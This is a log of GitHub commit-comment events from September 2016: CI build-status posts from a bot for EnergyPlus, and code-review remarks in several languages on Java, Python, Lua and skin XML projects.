{"id":"4587622955","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090946,"position":null,"line":null,"path":null,"commit_id":"22c4a04f5e4e54d66cb51f00a286a6f412468fd0","created_at":"2016-09-20T05:54:30Z","updated_at":"2016-09-20T05:54:30Z","body":"ASIHPValidation (mjwitte) - i386-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T05:54:30Z"}
{"id":"4587624741","type":"CommitCommentEvent","actor":{"login":"thedrow"},"repo":{"name":"kennethreitz/envoy"},"payload":{"comment":{"id":19090956,"position":null,"line":null,"path":null,"commit_id":"3f0c3e5dfc2ef241366342a2ab4eea14812951e5","created_at":"2016-09-20T05:55:10Z","updated_at":"2016-09-20T05:55:10Z","body":"This will break on Python 3."}},"created_at":"2016-09-20T05:55:10Z"}
{"id":"4587625502","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090957,"position":null,"line":null,"path":null,"commit_id":"22c4a04f5e4e54d66cb51f00a286a6f412468fd0","created_at":"2016-09-20T05:55:25Z","updated_at":"2016-09-20T05:55:25Z","body":"ASIHPValidation (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-22c4a04f5e4e54d66cb51f00a286a6f412468fd0-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T05:55:25Z"}
{"id":"4587626149","type":"CommitCommentEvent","actor":{"login":"manavgabhawala"},"repo":{"name":"mhacks/MHacks-Website"},"payload":{"comment":{"id":19090958,"position":93,"line":525,"path":"MHacks/frontend/views.py","commit_id":"d3dacdc7a9b571640a490e55747e68cd1df9df82","created_at":"2016-09-20T05:55:39Z","updated_at":"2016-09-20T05:55:39Z","body":"@omkarmoghe why you do this :("}},"created_at":"2016-09-20T05:55:39Z"}
{"id":"4587627289","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19090959,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T05:56:05Z","updated_at":"2016-09-20T05:56:05Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T05:56:05Z"}
{"id":"4587628992","type":"CommitCommentEvent","actor":{"login":"egov-systems"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":19090964,"position":5,"line":1659,"path":"egov/egov-collectionweb/src/main/java/org/egov/collection/web/actions/receipts/ReceiptAction.java","commit_id":"f8530933c68c4002e3204304236bba1e078881cf","created_at":"2016-09-20T05:56:42Z","updated_at":"2016-09-20T05:56:42Z","body":"Its not always fare to repeat the same mistake, equals should not be used to compare BigDecimal instead use compareTo. "}},"created_at":"2016-09-20T05:56:42Z"}
{"id":"4587630985","type":"CommitCommentEvent","actor":{"login":"qdwangqian"},"repo":{"name":"qdwangqian/test"},"payload":{"comment":{"id":19090970,"position":null,"line":null,"path":null,"commit_id":"716f9750c78b4e8f282cb5cbd23374d0d77e9300","created_at":"2016-09-20T05:57:26Z","updated_at":"2016-09-20T05:57:26Z","body":"hello"}},"created_at":"2016-09-20T05:57:26Z"}
{"id":"4587632584","type":"CommitCommentEvent","actor":{"login":"alternatebow"},"repo":{"name":"CS111C-META-FALL-2016/LabC-Team1"},"payload":{"comment":{"id":19090973,"position":null,"line":null,"path":null,"commit_id":"8f3ffd26cda1e95fdf1bcbfb0758f2de9971eee2","created_at":"2016-09-20T05:57:59Z","updated_at":"2016-09-20T05:57:59Z","body":"Looks great! Just one question though... for your add() method with just one parameter, shouldn't the previous last node be the value of the newest node's next value? Instead of it being the other way around? You know, since the newest node (being the one passed in) is supposed to point to the previous newest one (lastNode)? "}},"created_at":"2016-09-20T05:57:59Z"}
{"id":"4587632922","type":"CommitCommentEvent","actor":{"login":"donald-pinckney"},"repo":{"name":"donald-pinckney/Write-Up-1"},"payload":{"comment":{"id":19090974,"position":null,"line":null,"path":null,"commit_id":"8eba251ba79e8fe189b41bda4e07d76ec59be34a","created_at":"2016-09-20T05:58:07Z","updated_at":"2016-09-20T05:58:07Z","body":"Don't worry about this stuff right now, it's broken and is my fault, and won't even be used for this first homework. I'll fix this stuff before the next homework.  Just make sure `testing/test_all.sh` passes on your personal computer."}},"created_at":"2016-09-20T05:58:07Z"}
{"id":"4587636906","type":"CommitCommentEvent","actor":{"login":"molotoksoftware"},"repo":{"name":"molotoksoftware/auction"},"payload":{"comment":{"id":19090985,"position":144,"line":0,"path":"common/models/BalanceHistory.php","commit_id":"57c74f419a462eecd9b3c2dc199189a7997ecb03","created_at":"2016-09-20T05:59:32Z","updated_at":"2016-09-20T05:59:32Z","body":"да, все верно. Спасибо за поправки, видимо ночь дает о себе знать.\r\nВнес ваши изменения по локализации"}},"created_at":"2016-09-20T05:59:32Z"}
{"id":"4587638294","type":"CommitCommentEvent","actor":{"login":"molotoksoftware"},"repo":{"name":"molotoksoftware/auction"},"payload":{"comment":{"id":19090989,"position":171,"line":0,"path":"common/models/BalanceHistory.php","commit_id":"57c74f419a462eecd9b3c2dc199189a7997ecb03","created_at":"2016-09-20T06:00:05Z","updated_at":"2016-09-20T06:00:05Z","body":"STATUS_REFERAL не будет."}},"created_at":"2016-09-20T06:00:05Z"}
{"id":"4587640314","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091012,"position":10,"line":671,"path":"ryu/services/protocols/bgp/bgpspeaker.py","commit_id":"4fdb10953b7bb12f026056e6cc219b3e4202ed17","created_at":"2016-09-20T06:00:43Z","updated_at":"2016-09-20T06:00:43Z","body":"細かい話ですが、この文は\r\n```\r\nThe default is 'routes'.\r\n```\r\nではないでしょうか？"}},"created_at":"2016-09-20T06:00:43Z"}
{"id":"4587652338","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091058,"position":10,"line":671,"path":"ryu/services/protocols/bgp/bgpspeaker.py","commit_id":"4fdb10953b7bb12f026056e6cc219b3e4202ed17","created_at":"2016-09-20T06:04:35Z","updated_at":"2016-09-20T06:04:35Z","body":"ありがとうございます。修正します。"}},"created_at":"2016-09-20T06:04:35Z"}
{"id":"4587653049","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091059,"position":17,"line":678,"path":"ryu/services/protocols/bgp/bgpspeaker.py","commit_id":"4fdb10953b7bb12f026056e6cc219b3e4202ed17","created_at":"2016-09-20T06:04:50Z","updated_at":"2016-09-20T06:04:50Z","body":"ここにもデフォルト値が何であるか示す文が必要ではないでしょうか？\r\n```\r\nThe default is 'all'.\r\n```\r\n\r\n"}},"created_at":"2016-09-20T06:04:50Z"}
{"id":"4587653754","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19091062,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T06:05:07Z","updated_at":"2016-09-20T06:05:07Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2338 of 2338 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T06:05:07Z"}
{"id":"4587655648","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19091072,"position":null,"line":null,"path":null,"commit_id":"396aff71da19b6b8d844e555f13a218f9c7938bc","created_at":"2016-09-20T06:05:48Z","updated_at":"2016-09-20T06:05:48Z","body":"OK, read more about LUA... now i know that NILing table content removes it. LUA is different then other languages i used ;)"}},"created_at":"2016-09-20T06:05:48Z"}
{"id":"4587655944","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091074,"position":1,"line":1,"path":"PowerliftingShop/.classpath","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:05:54Z","updated_at":"2016-09-20T06:05:54Z","body":"Ten plik jest niepotrzebny. To jest plik charakterystyczny dla eclipse i trzeba go dodać do .gitignore"}},"created_at":"2016-09-20T06:05:54Z"}
{"id":"4587656080","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091075,"position":1,"line":1,"path":"PowerliftingShop/.project","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:05:58Z","updated_at":"2016-09-20T06:05:58Z","body":"Plik do .gitignore"}},"created_at":"2016-09-20T06:05:58Z"}
{"id":"4587656256","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091076,"position":1,"line":1,"path":"PowerliftingShop/.settings/org.eclipse.core.resources.prefs","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:02Z","updated_at":"2016-09-20T06:06:02Z","body":"Cały katalog .settings powinien być w .gitignore. Użyj www.gitignore.io żeby sobie pomóc"}},"created_at":"2016-09-20T06:06:02Z"}
{"id":"4587656750","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091078,"position":9,"line":9,"path":"PowerliftingShop/pom.xml","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:11Z","updated_at":"2016-09-20T06:06:11Z","body":"Domyślnie jest jar, więc można to usunąć"}},"created_at":"2016-09-20T06:06:11Z"}
{"id":"4587656964","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091081,"position":17,"line":17,"path":"PowerliftingShop/src/main/java/com/simongk/RunAtStart.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:16Z","updated_at":"2016-09-20T06:06:16Z","body":"Od Springa 4.3 (chyba) nie trzeba dodawać @Autowired na domyślnych konstruktorach.\r\nTen konstruktor można wygenerować lombokiem dodająć @AllArgsConstructor."}},"created_at":"2016-09-20T06:06:16Z"}
{"id":"4587657031","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091082,"position":23,"line":23,"path":"PowerliftingShop/src/main/java/com/simongk/RunAtStart.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:17Z","updated_at":"2016-09-20T06:06:17Z","body":"Tu trzeba mieć na uwadze to, że komponenty takie jak productRepository mogą być jeszcze nie gotowe do działania. Miałem kiedyś taki problem, że korzystałem w @PostConstruct z beanów, które istniały, ale jeszcze nie były w pełni zainicjalizowane. W tym przypadku to zadziała, ale na przyszłość warto chyba bardziej wykorzystać event emitowany po zainicjalizowaniu całej aplikacji."}},"created_at":"2016-09-20T06:06:17Z"}
{"id":"4587657293","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091083,"position":27,"line":27,"path":"PowerliftingShop/src/main/java/com/simongk/controllers/CartController.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:22Z","updated_at":"2016-09-20T06:06:22Z","body":"Wartość \"\" jest wartością domyślną i można z niej zrezygnować. Zamiast method = RequestMethod.GET i @RequestMapping można użyć @GetMapping"}},"created_at":"2016-09-20T06:06:22Z"}
{"id":"4587657355","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091084,"position":33,"line":33,"path":"PowerliftingShop/src/main/java/com/simongk/controllers/CartController.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:24Z","updated_at":"2016-09-20T06:06:24Z","body":"Tutaj podmapujesz się pod wszystkie możliwe metody REST: POST, GET, DELETE, HEAD itd. Zrób zamiast tego @DeleteMappling.\r\nAtrybut value jest domyślny, więc zamiast '@RequestMapping(value = \"/{id}/delete\")' można wpisać '@RequestMapping(\"/{id}/delete\")'"}},"created_at":"2016-09-20T06:06:24Z"}
{"id":"4587657417","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091086,"position":49,"line":49,"path":"PowerliftingShop/src/main/java/com/simongk/controllers/CartController.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:25Z","updated_at":"2016-09-20T06:06:25Z","body":"Operowanie na double'ach to bardzo słaby pomysł. Zawsze używaj BigDecimal i metody multiply"}},"created_at":"2016-09-20T06:06:25Z"}
{"id":"4587657505","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091087,"position":10,"line":10,"path":"PowerliftingShop/src/main/java/com/simongk/controllers/HomeController.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:27Z","updated_at":"2016-09-20T06:06:27Z","body":"(\"\") można usunąć. I zmień to na @Get/PostMapping"}},"created_at":"2016-09-20T06:06:27Z"}
{"id":"4587657619","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091088,"position":25,"line":25,"path":"PowerliftingShop/src/main/java/com/simongk/controllers/OrderController.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:30Z","updated_at":"2016-09-20T06:06:30Z","body":"Dodaj adnotację @Slf4j zamiast tego"}},"created_at":"2016-09-20T06:06:30Z"}
{"id":"4587657658","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091089,"position":28,"line":28,"path":"PowerliftingShop/src/main/java/com/simongk/controllers/OrderController.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:31Z","updated_at":"2016-09-20T06:06:31Z","body":"BigDecimal zamiast double"}},"created_at":"2016-09-20T06:06:31Z"}
{"id":"4587657753","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091090,"position":59,"line":59,"path":"PowerliftingShop/src/main/java/com/simongk/controllers/OrderController.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:33Z","updated_at":"2016-09-20T06:06:33Z","body":"Tę metodę można zrobić bardziej funkcyjnie:\r\ncartProducts\r\n  .stream()\r\n  .map(cart -> Cart::getCartCost)\r\n  .reduce(\r\n    BigDecimal.ZERO,\r\n    a, b -> a.add(b))"}},"created_at":"2016-09-20T06:06:33Z"}
{"id":"4587657926","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091091,"position":47,"line":47,"path":"PowerliftingShop/src/main/java/com/simongk/controllers/ProductController.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:37Z","updated_at":"2016-09-20T06:06:37Z","body":"Dlaczego to może się wywalić?"}},"created_at":"2016-09-20T06:06:37Z"}
{"id":"4587658163","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091095,"position":28,"line":28,"path":"PowerliftingShop/src/main/java/com/simongk/domain/Product.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:41Z","updated_at":"2016-09-20T06:06:41Z","body":"Po co to?"}},"created_at":"2016-09-20T06:06:41Z"}
{"id":"4587658259","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091096,"position":7,"line":7,"path":"PowerliftingShop/src/main/java/com/simongk/repositories/CartRepository.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:43Z","updated_at":"2016-09-20T06:06:43Z","body":"Można odziedziczyć JpaRepository i dostaniesz fajniejsze wersje metod (zwracające listy zamiast iterowalnych obiektów)"}},"created_at":"2016-09-20T06:06:43Z"}
{"id":"4587658493","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091097,"position":17,"line":17,"path":"PowerliftingShop/src/main/java/com/simongk/service/ProductGenerator.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:49Z","updated_at":"2016-09-20T06:06:49Z","body":"Dodaj słówko static do tych stałych i nazwij je wielkimi literami (NAMES zamiast names)"}},"created_at":"2016-09-20T06:06:49Z"}
{"id":"4587658607","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091099,"position":27,"line":27,"path":"PowerliftingShop/src/main/java/com/simongk/service/ProductGenerator.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:06:51Z","updated_at":"2016-09-20T06:06:51Z","body":"BigDecimal"}},"created_at":"2016-09-20T06:06:51Z"}
{"id":"4587658724","type":"CommitCommentEvent","actor":{"login":"iwaseyusuke"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091102,"position":17,"line":678,"path":"ryu/services/protocols/bgp/bgpspeaker.py","commit_id":"4fdb10953b7bb12f026056e6cc219b3e4202ed17","created_at":"2016-09-20T06:06:53Z","updated_at":"2016-09-20T06:06:53Z","body":"う〜ｎ、既存が書いているので、なるべく書いてありますが、\r\n関数の定義に\r\n```\r\ndef vrfs_get(self, subcommand='routes', route_dist=None,\r\n          route_family='all', format='json'):\r\n```\r\nとあり、ドキュメントとしても印字されるので、\r\n必須では無いかと思いますが、必須だと思った理由を教えてください。"}},"created_at":"2016-09-20T06:06:53Z"}
{"id":"4587659962","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091105,"position":10,"line":10,"path":"PowerliftingShop/src/test/java/com/simongk/PowerliftingShopApplicationTests.java","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:07:20Z","updated_at":"2016-09-20T06:07:20Z","body":"W tym teście nic nie ma, więc do usunięcia"}},"created_at":"2016-09-20T06:07:20Z"}
{"id":"4587660615","type":"CommitCommentEvent","actor":{"login":"arturowczarek"},"repo":{"name":"simongk/pwrlfitngshop"},"payload":{"comment":{"id":19091106,"position":1,"line":1,"path":"PowerliftingShop/target/.gitignore","commit_id":"745141b02b8c3a12bbb2eb1d92418322a990089a","created_at":"2016-09-20T06:07:32Z","updated_at":"2016-09-20T06:07:32Z","body":"Cały katalog target jest do usunięcia i do .gitignore"}},"created_at":"2016-09-20T06:07:32Z"}
{"id":"4587668376","type":"CommitCommentEvent","actor":{"login":"BogdanCurcan"},"repo":{"name":"Edewin/WorkTimer"},"payload":{"comment":{"id":19091117,"position":5,"line":5,"path":"README.md","commit_id":"8aaa4d720c5552f78d8322f59e7a297c13433e56","created_at":"2016-09-20T06:10:18Z","updated_at":"2016-09-20T06:10:18Z","body":"![image](https://cloud.githubusercontent.com/assets/22313089/18659242/0199e18c-7f12-11e6-87f1-6cdd62c596fe.png)\r\n"}},"created_at":"2016-09-20T06:10:18Z"}
{"id":"4587668412","type":"CommitCommentEvent","actor":{"login":"prashantiAdiraju"},"repo":{"name":"prashantiAdiraju/Mastering_CD"},"payload":{"comment":{"id":19091118,"position":null,"line":null,"path":null,"commit_id":"756f28de19b40be8d67554358d54ec7f4b3327b8","created_at":"2016-09-20T06:10:19Z","updated_at":"2016-09-20T06:10:19Z","body":"first commit"}},"created_at":"2016-09-20T06:10:19Z"}
{"id":"4587668663","type":"CommitCommentEvent","actor":{"login":"shinpeimuraoka"},"repo":{"name":"osrg/ryu"},"payload":{"comment":{"id":19091119,"position":17,"line":678,"path":"ryu/services/protocols/bgp/bgpspeaker.py","commit_id":"4fdb10953b7bb12f026056e6cc219b3e4202ed17","created_at":"2016-09-20T06:10:25Z","updated_at":"2016-09-20T06:10:25Z","body":"であれば、subcommand、route_familyも削除してしまってよいと思います。"}},"created_at":"2016-09-20T06:10:25Z"}
{"id":"4587670882","type":"CommitCommentEvent","actor":{"login":"Writtic"},"repo":{"name":"Writtic/docker-storm"},"payload":{"comment":{"id":19091124,"position":null,"line":null,"path":null,"commit_id":"44b6c820897a51d8e7825a13ff84fa38ee19155f","created_at":"2016-09-20T06:11:15Z","updated_at":"2016-09-20T06:11:15Z","body":"And install Python3"}},"created_at":"2016-09-20T06:11:15Z"}
{"id":"4587676057","type":"CommitCommentEvent","actor":{"login":"amai2012"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":19091137,"position":4,"line":855,"path":"cli/cmdlineparser.cpp","commit_id":"a50405b8abc32211481cebd19c55b37c19edb0e3","created_at":"2016-09-20T06:13:06Z","updated_at":"2016-09-20T06:13:06Z","body":"Placing it before `--errorlist` wouldn't cause more disorder to the list"}},"created_at":"2016-09-20T06:13:06Z"}
{"id":"4587677009","type":"CommitCommentEvent","actor":{"login":"reckart"},"repo":{"name":"webanno/webanno"},"payload":{"comment":{"id":19091142,"position":null,"line":null,"path":null,"commit_id":"675faa02509ce9c46ec8145511b08bc957f4eb0e","created_at":"2016-09-20T06:13:28Z","updated_at":"2016-09-20T06:13:28Z","body":"The commit does not include any updated unit test data. What does it do?"}},"created_at":"2016-09-20T06:13:28Z"}
{"id":"4587677751","type":"CommitCommentEvent","actor":{"login":"Martoon-00"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19091144,"position":null,"line":null,"path":null,"commit_id":"5ef98c8da84dcf0195eb3ae9a1bf016d263cbf7e","created_at":"2016-09-20T06:13:42Z","updated_at":"2016-09-20T06:13:42Z","body":"Oh, I didn't think it in this way. Will return `instance WithNamedLogger ((->) LoggerName)`"}},"created_at":"2016-09-20T06:13:42Z"}
{"id":"4587680958","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19091146,"position":null,"line":null,"path":null,"commit_id":"de04771aa8af7ec8afdbd47af3a5773f553579bf","created_at":"2016-09-20T06:14:50Z","updated_at":"2016-09-20T06:14:50Z","body":"Also see [Pull Request 280](http://github.com/weidai11/cryptopp/pull/280)."}},"created_at":"2016-09-20T06:14:50Z"}
{"id":"4587682433","type":"CommitCommentEvent","actor":{"login":"CodeRect"},"repo":{"name":"torch/sys"},"payload":{"comment":{"id":19091149,"position":8,"line":99,"path":"init.lua","commit_id":"7588fbd153136bc4e607ec42a04596b66010e647","created_at":"2016-09-20T06:15:21Z","updated_at":"2016-09-20T06:15:21Z","body":"please see #14, thank you!"}},"created_at":"2016-09-20T06:15:21Z"}
{"id":"4587682707","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19091150,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T06:15:27Z","updated_at":"2016-09-20T06:15:27Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - Win64-Windows-7-VisualStudio-12: OK (2338 of 2338 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-20T06:15:27Z"}
{"id":"4587685162","type":"CommitCommentEvent","actor":{"login":"joakim-hove"},"repo":{"name":"pgdr/ert"},"payload":{"comment":{"id":19091160,"position":null,"line":null,"path":null,"commit_id":"39b52c48ca13295cb348c9aecae35a884bf4a158","created_at":"2016-09-20T06:16:16Z","updated_at":"2016-09-20T06:16:16Z","body":"Å step in the right direction:-)"}},"created_at":"2016-09-20T06:16:16Z"}
{"id":"4587686228","type":"CommitCommentEvent","actor":{"login":"RobvanderDoes"},"repo":{"name":"OpenViX/skins"},"payload":{"comment":{"id":19091161,"position":null,"line":null,"path":null,"commit_id":"369a1f29e86f9ca6fa49db652dd056a1f6079891","created_at":"2016-09-20T06:16:37Z","updated_at":"2016-09-20T06:16:37Z","body":"'shite' as in 'Simply Hide Intelligently The Extra's'?\r\nBecause simply adding\r\n```\r\n\t<screen name=\"RadioInfoBar\" position=\"0,0\" size=\"0,0\" flags=\"wfNoBorder\">\r\n\t</screen>\r\n```\r\nto the skin is already enough:\r\n![iskin-radio-2](https://cloud.githubusercontent.com/assets/1040294/18658747/de92eee2-7f05-11e6-8dbf-0057da690f6f.jpg)\r\n\r\nAlthough then still the RadioText is missing. That could (slightly less simple, but still not very difficult) be done via\r\n```\r\n\t<screen name=\"RadioInfoBar\" position=\"1045,130\" size=\"800,400\" flags=\"wfNoBorder\">\r\n\t\t<widget source=\"RdsDecoder\" render=\"Label\" position=\"5,5\" size=\"790,390\" zPosition=\"4\" font=\"DT;35\" valign=\"center\" halign=\"center\">\r\n\t\t\t<convert type=\"RdsInfo\">RadioText</convert>\r\n\t</widget>\r\n\t</screen>\r\n```\r\nas the PiG-window is empty in radio anyway, and this would make the empty space useful.\r\n\r\n![iskin-radio-3](https://cloud.githubusercontent.com/assets/1040294/18659338/42783076-7f0a-11e6-9544-8ff4f64cd0b2.jpg)\r\n"}},"created_at":"2016-09-20T06:16:37Z"}
{"id":"4587686954","type":"CommitCommentEvent","actor":{"login":"Kyle873"},"repo":{"name":"Kyle873/PolarisCore"},"payload":{"comment":{"id":19091163,"position":null,"line":null,"path":null,"commit_id":"68fa5d83c6da5317c50edd3244f2925a175e2946","created_at":"2016-09-20T06:16:53Z","updated_at":"2016-09-20T06:16:53Z","body":"Also closes #19"}},"created_at":"2016-09-20T06:16:53Z"}
{"id":"4587688929","type":"CommitCommentEvent","actor":{"login":"xini"},"repo":{"name":"silverstripe/silverstripe-cms"},"payload":{"comment":{"id":19091166,"position":13,"line":181,"path":"javascript/LeftAndMain_right.js","commit_id":"41aec54e88c2838a862453ad27acbbce075cc3e2","created_at":"2016-09-20T06:17:30Z","updated_at":"2016-09-20T06:17:30Z","body":"I used to use my own fork for that particular client. Luckily I was able to convince them to upgrade..."}},"created_at":"2016-09-20T06:17:30Z"}
